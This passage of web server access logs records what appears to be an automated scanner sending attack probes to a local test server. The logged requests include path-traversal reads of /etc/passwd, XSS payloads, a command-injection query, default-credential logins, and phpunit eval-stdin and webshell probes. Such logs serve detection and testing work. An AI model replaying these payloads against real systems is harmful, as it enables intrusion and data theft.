+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cxcum/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"new_login_session_management=1&languageChoice=1&authUser=admin&clearPass=pass&languageChoice=10","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /showfile.php?file=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download.php?file=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /./../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/41 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"\x0D\x0A\x0D\x0A find_profile\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A name\x0D\x0A \x0D\x0A *\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/menu/latest/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php?page=my-chatbot&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appspec.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/log.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /versa/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms:// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@example.com%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?post_type=post&s=%22%3E%3Cscript%3Ealert(/29KD1tM09D5pzF6tEAXwD4QQRem/)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/proxy/tcp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/42 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"\x0D\x0A\x0D\x0A generate_script\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A {{profile}}\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A /etc/passwd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plc/webvisu.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /radiusmanager/user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"username=Administrator&password=versa123&sso=systemRadio","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /versa/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@example.com%5C@WillBeReplaced.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /stat.jsp?cmd=chcp+437+%7c+dir HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webapp/?fccc%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-includes/ALFA_DATA/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/43 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/components/suggestions?recentlyBrowsed= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Electron/download/windows/..%5C..%5C..%5CHttp%5Cwebroot%5Cconfig.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/XUI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/?uid=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/clientlogin/?srid=&action=showdeny&url= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/44 